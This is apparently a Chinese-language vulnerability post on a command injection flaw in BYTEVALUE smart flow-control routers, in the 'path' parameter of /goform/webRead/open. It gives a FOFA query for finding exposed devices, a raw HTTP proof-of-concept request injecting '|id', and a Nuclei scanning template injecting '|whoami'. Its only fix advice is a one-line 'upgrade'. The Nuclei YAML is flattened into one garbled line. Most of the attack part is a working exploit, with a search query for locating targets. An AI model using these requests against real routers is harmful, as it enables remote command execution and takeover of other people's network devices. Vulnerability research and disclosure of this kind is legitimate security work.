免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
BYTEVALUE 百为流控是一款追求完美上网体验、追求最大带宽利用率的多功能路由器,因其颠覆性的核心功能智能流控而名为百为流控路由器。在百为智能流控路由器/goform/webRead/open路由的 path 参数存在命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,获取服务器权限
Ⅱ、fofa语句
BYTEVALUE 智能流控路由器
Ⅲ、漏洞复现
POC
GET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
1、构建poc
Ⅳ、Nuclei-POC
id: Bytevalue-Routeinfo:name: Bytevalue-Routeauthor: WLFseverity: highdescription: descriptionreference:- https://4pts.onlinetags: rcerequests:- raw:- |+GET /goform/webRead/open/?path=|whoami HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1matchers-condition: andmatchers:- type: wordpart: bodywords:- admin- type: statusstatus:- 200
Ⅴ、修复建议
升级至安全版本